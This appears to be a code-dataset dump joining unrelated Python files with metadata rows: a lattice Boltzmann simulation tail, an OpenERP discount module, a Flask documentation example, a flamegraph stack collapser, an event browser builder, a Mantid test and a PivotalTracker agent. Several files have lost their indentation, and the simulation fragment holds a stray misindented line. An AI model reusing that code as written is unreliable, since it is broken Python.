UZ[:,:,:] = F[1,:,:,:]
UZ += F[11,:,:,:]
UZ += F[13,:,:,:]
UZ += F[15,:,:,:]
UZ += F[17,:,:,:]
UZ -= F[2,:,:,:]
UZ -= F[12,:,:,:]
UZ -= F[14,:,:,:]
UZ -= F[16,:,:,:]
UZ -= F[18,:,:,:]
UZ /=DENSITY
UX[0,:,:] += deltaU #Increase inlet pressure
        #Set boundaries to zero.
UX[:,:,:] *= BOUNDi
UY[:,:,:] *= BOUNDi
UZ[:,:,:] *= BOUNDi
DENSITY[:,:,:] *= BOUNDi
U_SQU = UX**2 + UY**2 + UZ**2
# Calculate equilibrium distribution: stationary
FEQ[0,:,:,:] = (t1*DENSITY)*(1.0-3.0*U_SQU/2.0)
# nearest-neighbours
T1 = 3.0/2.0*U_SQU
tDENSITY = t2*DENSITY
FEQ[1,:,:,:]=tDENSITY*(1.0 + 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[2,:,:,:]=tDENSITY*(1.0 - 3.0*UZ + 9.0/2.0*UZ**2 - T1)
FEQ[3,:,:,:]=tDENSITY*(1.0 + 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[4,:,:,:]=tDENSITY*(1.0 - 3.0*UY + 9.0/2.0*UY**2 - T1)
FEQ[5,:,:,:]=tDENSITY*(1.0 + 3.0*UX + 9.0/2.0*UX**2 - T1)
FEQ[6,:,:,:]=tDENSITY*(1.0 - 3.0*UX + 9.0/2.0*UX**2 - T1)
# next-nearest neighbours
T1 = 3.0*U_SQU/2.0
tDENSITY = t3*DENSITY
U8 = UX+UY
FEQ[7,:,:,:] =tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U9 = UX-UY
FEQ[8,:,:,:] =tDENSITY*(1.0 + 3.0*U9 + 9.0/2.0*(U9)**2 - T1)
U10 = -UX+UY
FEQ[9,:,:,:] =tDENSITY*(1.0 + 3.0*U10 + 9.0/2.0*(U10)**2 - T1)
U8 *= -1.0
FEQ[10,:,:,:]=tDENSITY*(1.0 + 3.0*U8 + 9.0/2.0*(U8)**2 - T1)
U12 = UX+UZ
FEQ[11,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
        U12 *= -1.0  # reverse direction for FEQ[14], mirroring the U8/U13 pattern
FEQ[14,:,:,:]=tDENSITY*(1.0 + 3.0*U12 + 9.0/2.0*(U12)**2 - T1)
U13 = UX-UZ
FEQ[12,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U13 *= -1.0
FEQ[13,:,:,:]=tDENSITY*(1.0 + 3.0*U13 + 9.0/2.0*(U13)**2 - T1)
U16 = UY+UZ
FEQ[15,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
U17 = UY-UZ
FEQ[16,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U17 *= -1.0
FEQ[17,:,:,:]=tDENSITY*(1.0 + 3.0*U17 + 9.0/2.0*(U17)**2 - T1)
U16 *= -1.0
FEQ[18,:,:,:]=tDENSITY*(1.0 + 3.0*U16 + 9.0/2.0*(U16)**2 - T1)
F *= (1.0-omega)
F += omega * FEQ
#Densities bouncing back at next timestep
F[1:,:,:,:] *= BOUNDi[np.newaxis,:,:,:]
F[1:,:,:,:] += BB[1:,:,:,:]
del BB
del T1
del UX, UY, UZ
del U_SQU
del DENSITY, tDENSITY
del U8, U9, U10, U12, U13, U16, U17
if util.Benchmark().bohrium:
np.flush()
B.stop()
B.pprint()
if B.outputfn:
B.tofile(B.outputfn, {'res': UX})
"""
import matplotlib.pyplot as plt
UX *= -1
plt.hold(True)
plt.quiver(UY[:,:,4],UX[:,:,4], pivot='middle')
plt.imshow(BOUND[:,:,4])
plt.show()
"""
if __name__ == "__main__":
main()
| lgpl-3.0 | -477,230,179,552,261,200 | 30.070922 | 88 | 0.351518 | false |
Micronaet/micronaet-mx | sale_discount/model/discount.py | 1 | 4156 | # -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2001-2014 Micronaet SRL (<http://www.micronaet.it>).
#
# Original module for stock.move from:
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
import os
import sys
import logging
import openerp
import openerp.netsvc as netsvc
import openerp.addons.decimal_precision as dp
from openerp.osv import fields, osv, expression, orm
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.tools.translate import _
from openerp.tools.float_utils import float_round as round
from openerp.tools import (DEFAULT_SERVER_DATE_FORMAT,
DEFAULT_SERVER_DATETIME_FORMAT,
DATETIME_FORMATS_MAP,
float_compare)
_logger = logging.getLogger(__name__)
discount_type = [
('integrated', 'Integrate'),
('inline', 'Inline'),
('row', 'Different row'),
]
class ResPartner(orm.Model):
    ''' Extra element for managing discounts
'''
_inherit = 'res.partner'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Update discount depend on scale (or reset scale)
'''
res = {'value': {}}
try:
if mode == 'scale':
scale = discount_scale.split('+')
discount_scale_cleaned = ''
rate = 100.0
for i in scale:
i = float(i.strip().replace('%', '').replace(',', '.'))
rate -= rate * i / 100.0
discount_scale_cleaned += "%s%5.2f%s " % (
'+' if discount_scale_cleaned else '', i, '%')
res['value']['discount'] = 100.0 - rate
res['value']['discount_scale'] = discount_scale_cleaned
else: # 'discount':
pass #res['value']['discount_scale'] = False
        except Exception:
res['warning'] = {
'title': _('Discount error'),
'message': _('Scale value not correct!'),
}
return res
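    # Worked example (illustrative): with discount_scale "10+5" the loop
    # compounds the percentages, rate = 100 * (1 - 0.10) * (1 - 0.05) = 85.5,
    # so the computed discount is 14.5 and the cleaned scale reads
    # "10.00% + 5.00% ".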
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=35),
'discount': fields.float('Discount', digits=(
16, 2), help='Automated calculate if scale is indicated'),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
class SaleOrderLine(orm.Model):
    ''' Add discount scale support to sale order lines
'''
_inherit = 'sale.order.line'
def onchange_discount(self, cr, uid, ids, discount_scale, discount,
mode='scale', context=None):
''' Call onchange in partner
'''
return self.pool.get('res.partner').onchange_discount(cr, uid, ids,
discount_scale=discount_scale, discount=discount, mode=mode,
context=context)
_columns = {
'discount_type': fields.selection(discount_type, 'Discount type'),
'discount_scale': fields.char('Discount scale', size=15),
}
_defaults = {
'discount_type': lambda *x: 'integrated',
}
| agpl-3.0 | 6,720,405,219,061,504,000 | 34.220339 | 79 | 0.568816 | false |
soulnothing/FlaskReDoc | example/exampleapplication.py | 1 | 3734 | import sys
import re
import json
from flask import current_app, render_template, render_template_string
from flask import Flask, jsonify
from threading import Thread
from flaskredoc import ReDoc
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.serving import run_simple
from werkzeug.debug import DebuggedApplication
import os
"""
This is an example application; it does not actually do anything real.
All responses are canned and some contain randomized JSON structures. It is
meant to show the ease of documenting your application.
"""
resp_folder = os.path.join(os.getcwd(), 'responses')
app = Flask(__name__)
app.debug = True
@app.route('/')
def blah():
'''
    The entry point function, which just returns a string.
    A function without much purpose; it simply returns a static string.
* @CODE 200: A successful response.
* @RESPONSE: sample.txt, Example Successful Response, 200 OK
'''
return "This is an example application, please see the help section"
@app.route('/db/user/<username>')
@app.route('/db/user', defaults={"username": None})
def query_user(username):
"""
Returns a json structure containing user information.
Takes in a username as a parameter either as a GET paramater or in the
url structure. It retrieves basic information including the username,
group, user id, and location. Case of the user name does not matter,
as the provided user name is forced to lower case prior to querying.
* @RESPONSE: db-user-query.json, Example Successful response, 200 OK
* query: /db/users/bob
* description: Querying for the user bob and gathering user information.
* @RESPONSE: db-users-query-error.json, Example User Does not exist, 400 BAD Response
* query: /db/users/gizmo
* description: Querying a non existent user.
* @RESPONSE: db-users-query-no-param.json, Example Invalid Parameters, 400 BAD Response
* query: /db/users
* description: No username is specified in the query.
* @GROUP: Database, User Management
* @URL 1 username: Specify the username to retrieve from the database.
* @GET username: Specify the username to retrieve from the database.
* @CODE 200: Successful response
* @CODE 400: Bad response queried user does not exist, or no parameters provided.
"""
return "user query"
@app.route('/db/users')
def query_users():
"""
Returns a list of all users.
Queries the database and returns an array
of all valid user names from the database.
* @RESPONSE: db-query-users.json, Example Successful Response, 200 OK
* query: /db/users
* description: A query to list all users.
* @RESPONSE: db-query-users-location.json, Example Successful Location Response, 200 OK
* query: /db/users?location=Dallas
* description: Query the Dallas location for it's users.
* @RESPONSE: db-query-users-group.xml, Example Successful Group Response, 200 OK
* query: /db/users?group=it
* description: Query the group it for it's users. Due to antiquated systems this is in xml.
* @GET group: Specify the group, you wish to get a list of users for.
* @GET location: Specify the location you wish to get a list of users for.
* @CODE 200: A successful response.
"""
return "users"
if __name__ == "__main__":
doc = ReDoc(app=app, respfolder=os.path.join(os.getcwd(), 'responses'))
doc.doc_app()
frontend = doc.create_frontend()
frontend.debug = True
api = doc.create_help_api()
api.debug = True
application = DispatcherMiddleware(app, {'/help': frontend,
'/help/api': api
})
run_simple('0.0.0.0', 5000, application, use_reloader=True, use_debugger=True)
| mit | 8,131,353,653,670,957,000 | 37.895833 | 99 | 0.697108 | false |
cykl/hprof2flamegraph | stackcollapse_hpl.py | 1 | 8006 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014, Clément MATHIEU
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import print_function
import struct
import collections
import sys
import re
Method = collections.namedtuple('Method', ['id', 'file_name', 'class_name', 'method_name'])
Trace = collections.namedtuple('Trace', ['thread_id', 'frame_count', 'frames'])
Frame = collections.namedtuple('Frame', ['bci', 'line_no', 'method_id'])
AGENT_ERRORS = [
"No Java Frames[ERR=0]",
"No class load[ERR=-1]",
"GC Active[ERR=-2]",
"Unknown not Java[ERR=-3]",
"Not walkable not Java[ERR=-4]",
"Unknown Java[ERR=-5]",
"Not walkable Java[ERR=-6]",
"Unknown state[ERR=-7]",
"Thread exit[ERR=-8]",
"Deopt[ERR=-9]",
"Safepoint[ERR=-10]",
]
def parse_hpl_string(fh):
(length,) = struct.unpack('>i', fh.read(4))
(val,) = struct.unpack('>%ss' % length, fh.read(length))
return val.decode('utf-8')
def parse_hpl(filename):
traces = []
methods = {}
for (index, error) in enumerate(AGENT_ERRORS):
method_id = -1 - index
methods[method_id] = Method(method_id, "", "/Error/", error)
with open(filename, 'rb') as fh:
while True:
marker_str = fh.read(1)
if not marker_str:
break
(marker,) = struct.unpack('>b', marker_str)
if marker == 0:
break
elif marker == 1 or marker == 11:
(frame_count, thread_id) = struct.unpack('>iQ', fh.read(4 + 8))
# marker is 11, read the time
if marker == 11:
(time_sec, time_nano) = struct.unpack('>QQ', fh.read(8+8))
if frame_count > 0:
traces.append(Trace(thread_id, frame_count, []))
                else:  # negative frame_count values are used to report errors
                    if abs(frame_count) > len(AGENT_ERRORS):
                        method_id = frame_count - 1
                        methods[method_id] = Method(method_id, "", "/Error/",
                                                    "Unknown err[ERR=%s]" % frame_count)
frame = Frame(None, None, frame_count - 1)
traces.append(Trace(thread_id, 1, [frame]))
elif marker == 2:
(bci, method_id) = struct.unpack('>iQ', fh.read(4 + 8))
frame = Frame(bci, None, method_id)
traces[-1].frames.append(frame)
elif marker == 21:
(bci, line_no, method_id) = struct.unpack('>iiQ', fh.read(4 + 4 + 8))
                    if line_no < 0:  # negative line_no values mean the line number is unavailable (-100 & -101)
line_no = None
frame = Frame(bci, line_no, method_id)
traces[-1].frames.append(frame)
elif marker == 3:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 31:
(method_id,) = struct.unpack('>Q', fh.read(8))
file_name = parse_hpl_string(fh)
class_name = parse_hpl_string(fh)
class_name_generic = parse_hpl_string(fh)
method_name = parse_hpl_string(fh)
method_signature = parse_hpl_string(fh)
method_signature_generic = parse_hpl_string(fh)
methods[method_id] = Method(method_id, file_name, class_name, method_name)
elif marker == 4: # 4 means thread meta, not useful in flame graph
(thread_id,) = struct.unpack('>Q', fh.read(8))
thread_name = parse_hpl_string(fh)
else:
raise Exception("Unexpected marker: %s at offset %s" % (marker, fh.tell()))
return traces, methods
def abbreviate_package(class_name):
match_object = re.match(r'(?P<package>.*\.)(?P<remainder>[^.]+\.[^.]+)$', class_name)
if match_object is None:
return class_name
shortened_pkg = re.sub(r'(\w)\w*', r'\1', match_object.group('package'))
return "%s%s" % (shortened_pkg, match_object.group('remainder'))
def get_method_name(method, shorten_pkgs):
class_name = method.class_name[1:-1].replace('/', '.')
if shorten_pkgs:
class_name = abbreviate_package(class_name)
method_name = class_name
method_name += '.' + method.method_name
return method_name
def format_frame(frame, method, discard_lineno, shorten_pkgs):
formatted_frame = get_method_name(method, shorten_pkgs)
if not discard_lineno and frame.line_no:
formatted_frame += ':' + str(frame.line_no)
return formatted_frame
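# Example (illustrative): with shorten_pkgs=True, a frame on line 42 of method
# "bar" in class "Lcom/example/pkg/Foo;" is rendered as "c.e.pkg.Foo.bar:42"
# (the JVM L...; wrapper is stripped, '/' becomes '.', the package shortened).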
def main(argv=None, out=sys.stdout):
import argparse
parser = argparse.ArgumentParser(description='Convert an hpl file into Flamegraph collapsed stacks')
parser.add_argument('hpl_file', metavar='FILE', type=str, nargs=1, help='A hpl file')
parser.add_argument('--discard-lineno', dest='discard_lineno', action='store_true', help='Remove line numbers')
parser.add_argument('--discard-thread', dest='discard_thread', action='store_true', help='Remove thread info')
parser.add_argument('--shorten-pkgs', dest='shorten_pkgs', action='store_true', help='Shorten package names')
parser.add_argument('--skip-trace-on-missing-frame', dest='skip_trace_on_missing_frame', action='store_true', help='Continue processing even if frames are missing')
args = parser.parse_args(argv)
filename = args.hpl_file[0]
(traces, methods) = parse_hpl(filename)
folded_stacks = collections.defaultdict(int)
for trace in traces:
frames = []
skip_trace = False
for frame in trace.frames:
if args.skip_trace_on_missing_frame and not frame.method_id in methods:
sys.stderr.write("skipped missing frame %s\n" % frame.method_id)
skip_trace = True
break
frames.append(format_frame(
frame,
methods[frame.method_id],
args.discard_lineno,
args.shorten_pkgs
))
if skip_trace:
continue
if not args.discard_thread:
frames.append('Thread %s' % trace.thread_id)
folded_stack = ';'.join(reversed(frames))
folded_stacks[folded_stack] += 1
for folded_stack in sorted(folded_stacks):
sample_count = folded_stacks[folded_stack]
print("%s %s" % (folded_stack, sample_count), file=out)
return 0
if __name__ == '__main__':
main()
| bsd-2-clause | 1,047,224,140,835,399,000 | 39.226131 | 168 | 0.602998 | false |
AdrienGuille/pyMABED | build_event_browser.py | 1 | 3036 | # coding: utf-8
# std
import time
import argparse
import os
import shutil
# web
from flask import Flask, render_template
from flask_frozen import Freezer
# mabed
import mabed.utils as utils
__author__ = "Adrien Guille"
__email__ = "[email protected]"
event_browser = Flask(__name__, static_folder='browser/static', template_folder='browser/templates')
@event_browser.route('/')
def index():
return render_template('template.html',
events=event_descriptions,
event_impact='[' + ','.join(impact_data) + ']',
k=mabed.k,
theta=mabed.theta,
sigma=mabed.sigma)
if __name__ == '__main__':
p = argparse.ArgumentParser(description='Build event browser')
p.add_argument('i', metavar='input', type=str, help='Input pickle file')
p.add_argument('--o', metavar='output', type=str, help='Output html directory', default=None)
args = p.parse_args()
print('Loading events from %s...' % args.i)
mabed = utils.load_events(args.i)
# format data
print('Preparing data...')
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple()))*1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
related_terms.append(related_term[0]+' ('+str("{0:.2f}".format(related_term[1]))+')')
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
', '.join(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append('['+str(formatted_dates[i])+','+str(value)+']')
impact_data.append('{"key":"' + main_term + '", "values":[' + ','.join(formatted_anomaly) + ']}')
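        # Each appended entry is one chart-ready series with (roughly) the
        # shape {"key": "<main term>", "values": [[timestamp_ms, anomaly], ...]}.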
if args.o is not None:
if os.path.exists(args.o):
shutil.rmtree(args.o)
os.makedirs(args.o)
print('Freezing event browser into %s...' % args.o)
event_browser_freezer = Freezer(event_browser)
event_browser.config.update(
FREEZER_DESTINATION=args.o,
FREEZER_RELATIVE_URLS=True,
)
event_browser.debug = False
event_browser.config['ASSETS_DEBUG'] = False
event_browser_freezer.freeze()
print('Done.')
else:
event_browser.run(debug=False, host='localhost', port=2016)
| mit | -3,382,823,232,691,615,000 | 34.717647 | 105 | 0.553689 | false |
mganeva/mantid | qt/python/mantidqt/widgets/codeeditor/test/test_multifileinterpreter.py | 1 | 2516 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2017 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source
# & Institut Laue - Langevin
# SPDX - License - Identifier: GPL - 3.0 +
# This file is part of the mantid workbench.
#
#
from __future__ import (absolute_import, unicode_literals)
import unittest
from mantid.py3compat import mock
from mantidqt.utils.qt.testing import GuiTest
from mantidqt.utils.qt.testing.qt_widget_finder import QtWidgetFinder
from mantidqt.widgets.codeeditor.multifileinterpreter import MultiPythonFileInterpreter
MANTID_API_IMPORT = "from mantid.simpleapi import *\n"
PERMISSION_BOX_FUNC = ('mantidqt.widgets.codeeditor.scriptcompatibility.'
'permission_box_to_prepend_import')
class MultiPythonFileInterpreterTest(GuiTest, QtWidgetFinder):
def test_default_contains_single_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
def test_add_editor(self):
widget = MultiPythonFileInterpreter()
self.assertEqual(1, widget.editor_count)
widget.append_new_editor()
self.assertEqual(2, widget.editor_count)
def test_open_file_in_new_tab_import_added(self):
test_string = "Test file\nLoad()"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertEqual(widget.current_editor().editor.isModified(), True,
msg="Script not marked as modified.")
self.assertIn(MANTID_API_IMPORT, widget.current_editor().editor.text(),
msg="'simpleapi' import not added to script.")
def test_open_file_in_new_tab_no_import_added(self):
test_string = "Test file\n"
widget = MultiPythonFileInterpreter()
mock_open_func = mock.mock_open(read_data=test_string)
with mock.patch(widget.__module__ + '.open', mock_open_func, create=True):
with mock.patch(PERMISSION_BOX_FUNC, lambda: True):
widget.open_file_in_new_tab(test_string)
self.assertNotIn(MANTID_API_IMPORT,
widget.current_editor().editor.text())
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -4,618,802,130,108,384,000 | 40.933333 | 87 | 0.675278 | false |
matus-stehlik/glowing-batman | base/templatetags/roots_tags.py | 1 | 1874 | from django import template
from django.core.urlresolvers import reverse
from django.conf import settings
from django.template.base import TemplateSyntaxError
register = template.Library()
@register.simple_tag
def url_active(request, urls, *args, **kwargs):
if request.path in (reverse(url, args=list(*args), kwargs=dict(**kwargs))
for url in urls.split()):
return "active"
else:
return ""
@register.filter
def remove_uncomplete_latex(text):
    # An even number of segments separated by $$ means an incomplete
    # display equation
if len(text.split('$$')) % 2 == 0:
# Return the original text
return '$$'.join(text.split('$$')[:-1])
elif len(text.split('$')) % 2 == 0:
return '$'.join(text.split('$')[:-1])
else:
return text
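# Example (illustrative): "text $$x^2$$ more $$y" splits into an even number of
# '$$' segments, so the dangling "$$y" is dropped and "text $$x^2$$ more " is
# returned; fully balanced input passes through unchanged.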
class DefineNode(template.Node):
def __init__(self, name, nodelist):
self.name = name
self.nodelist = nodelist
def __repr__(self):
return "<DefineNode>"
def render(self, context):
context[self.name] = self.nodelist.render(context)
return ''
@register.tag
def define(parser, token):
"""
Adds a name to the context for referencing an arbitrarily defined block
of template code.
For example:
{% define my_block %}
This is the content.
{% enddefine %}
Now anywhere in the template:
{{ my_block }}
"""
bits = list(token.split_contents())
if len(bits) != 2:
raise TemplateSyntaxError("Expected format is: {% define variable %}")
name = bits[1]
nodelist = parser.parse(('enddefine',))
parser.delete_first_token()
return DefineNode(name, nodelist)
@register.filter
def access(value, arg):
return value.get(arg, {})
@register.simple_tag
def settings_value(name):
return getattr(settings, name, "")
| mit | -6,420,556,990,031,565,000 | 22.425 | 78 | 0.61953 | false |
nfcharles/python-aws-sign | aws_sign/v4/__init__.py | 1 | 1295 | from .. import ServiceConstants
class Sigv4ServiceConstants(ServiceConstants):
"""Logical grouping of Signature Version 4 service constants
This class sets the appropriate Signature v4 specific parameters required
for signing.
"""
# Minimum required headers for signature v4 signed requests
__REQUIRED_HEADERS = {'host': None, 'x-amz-date': None}
def __init__(self, scheme, host, service, region):
"""Initializes v4 specific constants
Parameters
host: service host
service: service name
region: service region
"""
super(Sigv4ServiceConstants, self).__init__(scheme,
host,
service,
region,
algorithm='AWS4-HMAC-SHA256',
signing='aws4_request')
self.__headers = self._merge(super(Sigv4ServiceConstants, self).headers,
self.__REQUIRED_HEADERS,
{'host': self.host})
@property
def headers(self):
return self.__headers
| mit | -6,848,493,036,127,987,000 | 37.088235 | 81 | 0.484942 | false |
CognizantOneDevOps/Insights | PlatformAgents/com/cognizant/devops/platformagents/agents/alm/pivotaltracker/PivotalTrackerAgent3.py | 1 | 16890 |
#-------------------------------------------------------------------------------
# Copyright 2017 Cognizant Technology Solutions
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
#-------------------------------------------------------------------------------
'''
Created on May 9, 2018
@author: 476693
'''
from ....core.BaseAgent3 import BaseAgent
import time
import requests
import json
import datetime
from dateutil import parser
class PivotalTrackerAgent(BaseAgent):
@BaseAgent.timed
def process(self):
self.setUpVariables()
self.login()
self.getProjectList()
self.getAllEpics()
self.storyDataCollection()
self.getIterationData()
if self.config.get('getAllActivity', False):
self.getAllActivities()
if self.config.get('getAllMembers', False):
self.getAllMembers()
def getAllMembers(self):
self.memberData = []
memeber_relation_metadata = {"labels" : ["LATEST"],
"relation" : {"name" : "MEMBER_DETAILS",
"properties" : ["ownerId", "memeberName", "memeberEmail"],
"source" : {"constraints" : ["projectId", "memeberName"] },
"destination" : { "constraints" : ["ownerId"]}}}
for project in self.all_projects:
projectId = str(project.get('projectId'))
memberships = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId +"/memberships",
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
for member in memberships:
injectData = {}
injectData['projectId'] = projectId
injectData['ownerId'] = member.get('person', {}).get('id')
injectData['memeberName'] = member.get('person', {}).get('name')
injectData['memeberEmail'] = member.get('person', {}).get('email')
injectData['memeberUserName'] = member.get('person', {}).get('username')
self.memberData.append(injectData)
self.publishToolsData(self.memberData, memeber_relation_metadata)
def getAllActivities(self):
self.allActivitiesData = []
for project in self.all_projects:
projectId = str(project.get('projectId'))
activityCollection = True
offset = 0
startFrom = self.tracking.get('trackingInfo', {}).get(str(projectId), {}).get('lastActivityDate', self.startFrom)
lastUpdatedDate = 0
while activityCollection:
activities = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId + "/activity"
+"?occurred_after=" + startFrom + "&limit=200&offset=" + str(offset),
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
offset = offset + 200
if len(activities) > 0:
latest_update_time = int(time.mktime(time.strptime(activities[0]['occurred_at'], self.timeStampFormat)))
if lastUpdatedDate < latest_update_time:
lastUpdatedDate = latest_update_time
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
trackingDetails['lastActivityDate'] = activities[0]['occurred_at']
for activity in activities:
injectData = {}
injectData['projectId'] = projectId
injectData['nodeType'] = 'activity update'
if 'primary_resources' in activity:
injectData['key'] = activity.get('primary_resources')[0].get('id', '')
injectData['storyName'] = activity.get('primary_resources')[0].get('name', '')
injectData['storyType'] = activity.get('primary_resources')[0].get('story_type', '')
if len( activity.get('changes') ) > 0:
for change in activity.get('changes'):
injectData['occurredAt'] = activity.get('occurred_at','')
injectData['kind'] = activity.get('kind','')
#injectData['storyState'] = activity.get('current_state','')
injectData['message'] = activity.get('message','')
if 'original_values' in change and 'estimate' in change['original_values']:
injectData['storyPoint'] = change['new_values']['estimate']
elif 'original_values' in change and 'current_state' in change['original_values']:
injectData['storyState'] = change['new_values']['current_state']
elif 'new_values' in change and 'description' in change['new_values']:
injectData['description'] = change['new_values']['description']
if 'new_values' in change and 'commit_identifier' in change.get('new_values'):
injectData['attachedCommitId'] = change['new_values']['commit_identifier']
injectData['attachedScmType'] = change['new_values']['commit_type']
injectData['attachedCommitMessage'] = change['new_values']['text']
self.allActivitiesData += self.parseResponse(self.activityResponseTemplate, activity, injectData)
if len(activities) == 0:
activityCollection = False
if len(activities)> 0:
self.tracking['trackingInfo'][(projectId)] = trackingDetails
activityinsighstTimeX = self.config.get('dynamicTemplate', {}).get('activity',{}).get('insightsTimeXFieldMapping',None)
timestamp = activityinsighstTimeX.get('timefield',None)
timeformat = activityinsighstTimeX.get('timeformat',None)
isEpoch = activityinsighstTimeX.get('isEpoch',False)
self.publishToolsData(self.allActivitiesData,self.activityMetadata,timestamp,timeformat,isEpoch,True)
#self.publishToolsData(self.allActivitiesData,self.activityRelationMetadata)
self.updateTrackingJson(self.tracking)
def getAllEpics(self):
self.epics = {}
for project in self.all_projects:
projectId = str(project.get('projectId'))
epics = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId + "/epics" ,
'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
epic_list = []
for epic in epics:
epic_list.append(epic.get('label', {}).get('name', ''))
self.epics[projectId] = epic_list
def storyDataCollection(self):
story_update_activity_category = ["story_update_activity", "comment_create_activity"]
for project in self.all_projects:
projectId = str(project.get('projectId'))
dataCollection = True
offset = 0
startFrom = self.tracking.get('trackingInfo', {}).get(str(projectId), {}).get('lastUpdatedDate', self.startFrom)
trackingDetails = self.tracking.get('trackingInfo', {}).get(str(projectId), {})
lastUpdatedDate = 0
while dataCollection:
storyDetails = self.getResponse(self.baseEndPoint + "/services/v5/projects/"+ projectId +
"/stories?updated_after=" + startFrom + "&limit=200&offset=" + str(offset)
,'GET', self.userid, self.password, None, reqHeaders=self.reqHeaders)
offset = offset + 200
self.storyPublishData = []
for story in storyDetails:
latest_update_time = int(time.mktime(time.strptime(story.get('updated_at'), self.timeStampFormat)))
if lastUpdatedDate < latest_update_time:
lastUpdatedDate = latest_update_time
trackingDetails['lastUpdatedDate'] = story.get('updated_at')
injectData = {}
epicName = [i['name'] for i in story.get('labels', [])]
injectData['epicName'] = epicName
#dateCheck = lambda lastUpdatedDate: story.get('updated_at', '')
#if self.startFrom < latest_update_time:
#story.get('updated_at', '')
#else :
#lastUpdatedDate=dateCheck(story.get('updated_at', ''))
self.storyPublishData += self.parseResponse(self.storyResponseTemplate, story, injectData)
if len(storyDetails) == 0:
dataCollection = False
self.tracking['trackingInfo'][str(projectId)] = trackingDetails
self.publishToolsData(self.storyPublishData, self.storyMetadata)
